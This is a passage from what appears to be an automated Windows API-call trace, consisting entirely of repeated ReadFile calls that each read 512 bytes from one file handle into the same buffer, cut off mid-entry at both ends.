lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.030] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.031] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 
[0130.032] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, 
lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.033] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, 
lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.034] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.035] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.041] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.041] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.042] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.043] ReadFile (in: hFile=0x58, 